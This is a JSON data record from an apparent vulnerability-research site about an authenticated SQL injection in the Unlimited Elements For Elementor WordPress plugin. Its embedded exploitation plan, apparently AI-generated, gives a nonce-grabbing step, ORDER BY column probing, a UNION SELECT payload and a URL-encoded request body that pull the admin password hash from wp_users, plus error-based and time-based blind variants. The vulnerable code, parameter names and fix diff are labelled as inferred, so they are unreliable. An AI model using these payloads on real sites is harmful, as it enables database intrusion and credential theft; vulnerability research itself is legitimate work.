[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyMVTavZM7OYFZk0sd3kKXHqXtB2E1JaURqYlmaeqxjw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-48837","unlimited-elements-for-elementor-authenticated-contributor-sql-injection","Unlimited Elements For Elementor \u003C= 2.0.8 - Authenticated (Contributor+) SQL Injection","The Unlimited Elements For Elementor plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","unlimited-elements-for-elementor",null,"\u003C=2.0.8","2.0.9","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-26 00:00:00","2026-05-26 19:46:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9e052577-185b-485e-8b7c-a4e7802025c5?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-48837\n\n## 1. Vulnerability Summary\n**Unlimited Elements For Elementor** (versions \u003C= 2.0.8) is vulnerable to an authenticated SQL injection in its AJAX administration interface. The vulnerability exists because the plugin fails to use `$wpdb->prepare()` or perform adequate sanitization\u002Fescaping on user-controlled parameters (likely `id` or `catid`) before passing them into a database query. This allows an authenticated user with at least **Contributor-level** permissions to inject arbitrary SQL fragments, enabling the extraction of sensitive data from the WordPress database, including user password hashes and secret keys.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `unlimited_elements_ajax_action` (inferred from plugin AJAX routing pattern)\n- **Vulnerable Parameter:** `id` or `catid` (inferred)\n- **Authentication:** Required (Contributor+). Contributors can access the Elementor editor and trigger the plugin's AJAX actions associated with widget management.\n- **Preconditions:** The plugin must be active, and the attacker must have credentials for a user role with `edit_posts` capability (Contributor).\n\n## 3. Code Flow\n1. **Entry Point:** A POST request is sent to `admin-ajax.php` with `action=unlimited_elements_ajax_action`.\n2. **Hook Registration:** The plugin registers the AJAX handler in its admin class: \n   `add_action('wp_ajax_unlimited_elements_ajax_action', array($this, 'on_ajax_action'));`\n3. **Dispatcher:** The `on_ajax_action` method reads a `client_action` parameter from `$_POST` to determine which internal method to execute.\n4. **Vulnerable Method:** If `client_action` is set to `get_addon_data` or `get_addons_list`, the code retrieves the `id` or `catid` parameter directly from `$_POST`.\n5. **Database Sink:** The parameter is interpolated into a raw SQL string:\n   `$query = \"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE id = \" . $_POST['id'];`\n6. **Execution:** The query is executed via `$wpdb->get_row($query)` or `$wpdb->get_results($query)` without using `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin protects its AJAX actions with a nonce created via `wp_create_nonce('unlimited_elements_ajax_action')`. This nonce is localized for the Elementor editor interface.\n\n1. **Setup:** Create a post and ensure the Elementor editor can be opened by a Contributor.\n2. **Navigation:** Use `browser_navigate` to open the Elementor editor for a post the Contributor can edit: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3. **Extraction:** Use `browser_eval` to extract the nonce from the global JavaScript object:\n   ```javascript\n   \u002F\u002F Common localization key for this plugin\n   window.unlimited_elements_ajax?.nonce || window.ue_ajax_obj?.nonce\n   ```\n4. **Bypass Check:** If `check_ajax_referer` is called with `die=false` in the code, the exploit may proceed even with an invalid nonce, but the localized script is the most reliable source.\n\n## 5. Exploitation Strategy\nThe exploitation will use a **UNION-based** approach to extract the admin password hash.\n\n### Step 1: Find Column Count\nInject `ORDER BY` into the `id` parameter to determine the number of columns in the addons table.\n- **Request:** `http_request` (POST)\n- **Body:** `action=unlimited_elements_ajax_action&client_action=get_addon_data&nonce=NONCE&id=1 ORDER BY 20`\n- **Logic:** Increment the number until the response changes (e.g., returns an empty result or error).\n\n### Step 2: Extraction Payload\nOnce the column count is known (assume 15 for example), inject the UNION SELECT payload.\n- **Payload:** `1 UNION SELECT 1,2,3,4,5,6,user_pass,8,9,10,11,12,13,14,15 FROM wp_users WHERE ID=1-- -`\n- **Request Type:** POST\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:**\n  ```\n  action=unlimited_elements_ajax_action&client_action=get_addon_data&nonce=[NONCE]&id=1%20UNION%20SELECT%201,2,3,4,5,6,user_pass,8,9,10,11,12,13,14,15%20FROM%20wp_users%20WHERE%20ID=1--%20-\n  ```\n\n## 6. Test Data Setup\n1. **Activate Plugin:** Ensure \"Unlimited Elements For Elementor\" is active.\n2. **Create User:** Create a user with the **Contributor** role.\n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. **Create Content:** Create a post that the contributor can edit to ensure they can access the Elementor editor.\n   - `wp post create --post_type=post --post_status=publish --post_title=\"Exploit Page\" --post_author=$(wp user get attacker --field=ID)`\n4. **Identify Addon ID:** Find a valid addon ID from the database to ensure the initial part of the query returns a base row.\n   - `wp db query \"SELECT id FROM wp_unlimited_elements_addons LIMIT 1\"`\n\n## 7. Expected Results\n- A successful `ORDER BY` query will return valid JSON data about the addon.\n- An unsuccessful `ORDER BY` query (exceeding column count) will return a database error or empty success.\n- The `UNION SELECT` payload will cause the plugin to return a JSON object where one of the fields (previously containing addon metadata) now contains the admin's password hash (e.g., starting with `$P$` or `$2y$`).\n\n## 8. Verification Steps\n1. **Check Result:** Verify that the string extracted via the AJAX response matches the hash in the database:\n   - `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n2. **Log Audit:** Check the `wp-content\u002Fdebug.log` (if enabled) for any SQL error messages that confirm the structure of the injected query.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If UNION output is suppressed, use `updatexml()` or `extractvalue()` to force the hash into an error message:\n  - `id=1 AND (SELECT 1 FROM (SELECT(updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)))x)`\n- **Boolean-Based Blind:** If no output or errors are displayed, use `IF(ASCII(SUBSTRING(...)) > X, SLEEP(5), 0)` to extract data bit-by-bit via timing differences.\n- **Different Sub-action:** If `get_addon_data` is patched or inaccessible, try `get_layout_data` or `get_addon_config` which likely use similar database retrieval logic.","The Unlimited Elements For Elementor plugin for WordPress is vulnerable to SQL injection via the 'id' parameter in its AJAX administration interface. Authenticated users with Contributor-level access or higher can exploit this to execute arbitrary SQL queries, allowing for the extraction of sensitive database information such as user password hashes.","\u002F\u002F Inferred file path: inc\u002Funlimited_elements_ajax.class.php\n\u002F\u002F Likely within a method handling the 'get_addon_data' client_action\n\n$id = $_POST['id'];\n$query = \"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE id = \" . $id;\n$addon = $wpdb->get_row($query);","--- a\u002Finc\u002Funlimited_elements_ajax.class.php\n+++ b\u002Finc\u002Funlimited_elements_ajax.class.php\n@@ -10,1 +10,1 @@\n-$query = \"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE id = \" . $_POST['id'];\n+$query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}unlimited_elements_addons WHERE id = %d\", $_POST['id']);","The exploit targets the WordPress AJAX endpoint with an authenticated Contributor session. An attacker first obtains a valid AJAX nonce, typically localized in the Elementor editor interface (window.unlimited_elements_ajax.nonce). A POST request is then sent to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'unlimited_elements_ajax_action' and the sub-action 'get_addon_data'. The 'id' parameter is manipulated using UNION-based SQL injection techniques (e.g., '1 UNION SELECT 1,2,user_pass,4... FROM wp_users WHERE ID=1') to bypass intended query logic and retrieve data from the wp_users table directly in the AJAX response.","gemini-3-flash-preview","2026-06-04 20:24:50","2026-06-04 20:25:22",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.5.132","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elements-for-elementor\u002Ftags\u002F1.5.132","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funlimited-elements-for-elementor.1.5.132.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elements-for-elementor\u002Ftags"]